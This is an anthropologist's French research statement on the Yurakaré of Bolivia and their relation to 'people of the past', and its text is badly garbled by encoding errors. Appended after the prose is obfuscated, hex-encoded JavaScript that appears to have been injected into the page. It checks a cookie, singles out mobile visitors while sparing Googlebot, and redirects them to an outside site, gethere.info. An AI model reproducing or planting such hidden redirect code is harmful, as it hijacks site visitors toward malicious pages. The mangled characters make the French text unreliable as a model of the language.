Vincent HIRTZEL

Vincent HIRTZEL, anthropologue, CNRS (centre EREA du LESC) a�� hirtzel@hotmail.fr

Les recherches que je dA�velopperai se situeront A� la��intersection des champs de la��anthropologie et de la��histoire et porteront sur les YurakarA�, une population da��Amazonie bolivienne qui rA�side au pied de la cordillA?re des Andes. Au nombre da��environ 4000 personnes, bilingues yurakarA�/espagnol pour un peu moins de la moitiA� da��entre eux, monolingues en espagnol pour les autres, les YurakarA� constituent aujourda��hui un groupe minoritaire dispersA� dans un territoire globalement multi-ethnique de la taille de la Belgique.

A la��aide des donnA�es de terrain que ja��ai eu la��occasion de recueillir dans plusieurs de leurs communautA�s, durant deux phases de travail parmi eux (entre 1999 et 2001 puis entre 2007 et 2011), je ma��attacherai A� explorer les modalitA�s hA�tA�rogA?nes et en partie contradictoires da��attachement et de dA�tachement, da��identification et de mise A� distance, de continuitA� et de rupture qui caractA�risent le rapport qua��ils entretiennent aux A�A�gens du passA�A�A� (pA�pA?shamaw en yurakarA�, la gente antigua en espagnol) ainsi que la maniA?re dont ce rapport nourri leur engagement collectif en tant que A�A�nousA�A� face aux populations avec lesquelles ils interagissent localement ou, plus gA�nA�ralement a�� et en termes da��avantage politique a��, A� la��A�chelle de la Bolivie.

Je chercherai en particulier A� tenir compte du chevauchement actuel de deux dynamiques socio-historiques marquantes de la trajectoire historique des YurakarA�A�: da��une part les effets cumulA�s sur le long terme des stratA�gies de voilement, de mise en clandestinitA� ou de renoncement progressif A� un certain hA�ritage de leur passA� a�� rituels, pratiques, savoirs, langue vernaculaire a�� lorsque, gA�nA�rateurs de A�A�honteA�A�, ils A�taient par trop aisA�ment identifiables A� des manifestations de leur condition de A�A�barbaresA�A� (bA?rbaros) et, da��autre part, le regain da��intA�rA?t rA�cent pour ce mA?me passA�, qui accompagnent les transformations politiques de la��A�tat bolivien depuis une vingtaine da��annA�es maintenant. Aujourda��hui, les YurakarA�, qui ont reA�u le statut officiel de nation dans la nouvelle constitution du pays approuvA�e en 2009, se meuvent dans une conjoncture oA? ils sont jugA�s du dehors, non plus, comme ca��A�tait encore le cas il y a peu, sur une A�chelle da��accomplissement de la��humanitA� (barbare ou civilisA�) mais A� travers le paradigme A�galitaire de la diffA�rence culturelle. Estimable, cette derniA?re est devenue une valeur en soiA�: elle est A� prA�server, A� afficher, A� patrimonialiser et, grA?ce au tourisme, on la considA?re mA?me comme un potentiel vecteur de dA�veloppement A�conomique.

Dans la��entre-jeu de ces reconfigurations, les processus rA�flexifs entrainA�s par la��appropriation et la��usage par les YurakarA� des termes espagnols de costumbre (coutume) et de cultura (culture) me paraissent particuliA?rement dignes da��intA�rA?t pour cerner des aspects cruciaux du rapport avec les A� gens da��autrefois A�. Des indices congruents laissent entrevoir que le terme de costumbre vA�hicule pour eux une notion de A�A�maniA?re da��A?treA�A� qui apparaA�t soudA�e A� une condition A� barbare A� et qui se branche A� la dimension morale du vice. Il se distingue incontestablement de celui de cultura, plus rA�cemment importA�, porteur da��un sA�mantisme plus faible mais connectA� A� un horizon plus vertueuxA�: la cultura, ca��est ce qui permet de forger une nouvelle image de soi, folklorisante et indigA�nisanteA�; dotA�e da��un potentiel da��ouverture et de visibilisation, ca��est une banniA?re propice A� la (rA�)invention, A� la production de A�A�manifestations culturellesA�A�, de A� spectaclesA�A�. Autant pour soi que pour les autres, la culturaA�rA�pond a des contraintes qui lui sont propres et, en tout cas, n’entretient pas forcA�ment de lien de continuitA� directe avec les costumbres da��antan ou le mode de vie des A�A�gens da��autrefoisA�A�A�: le retour A� la A�A�barbarieA�A� na��est pas envisageable.

Dans un tel contexte, je me tournerai A�galement sur la place que peuvent accorder aujourda��hui les YurakarA� aux A� paroles des gens da��autrefois A� (pA�pA?shamaw mabuybu), A� savoir ces narrations que la��on a la��habitude de dA�signer comme des A� mythes A�A�en me demandant quelle est la place que les YurakarA� leur donnent aujourda��hui. Unissant le passA� au prA�sent, les vieux aux jeunes, ces paroles qui ont percolA� A� travers les gA�nA�rations, qui ont A�tA� discrA?tement transmises de bouche A� oreilles, constituent un fil (ou plus exactement une voie) qui vient de loin. Dans un contexte de patrimonialisation accentuA�e, oA? les modalitA�s de leur transmission se diversifient puisqua��on les met en A�criture et on en fait des mises en scA?ne filmA�e, les mythes commencent A� A?tre A� visibles A� et plus seulement audibles. Peut-on donc en dA�duire que les mythes sont A�galement en train de passer du cA?tA� de la cultura ?

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}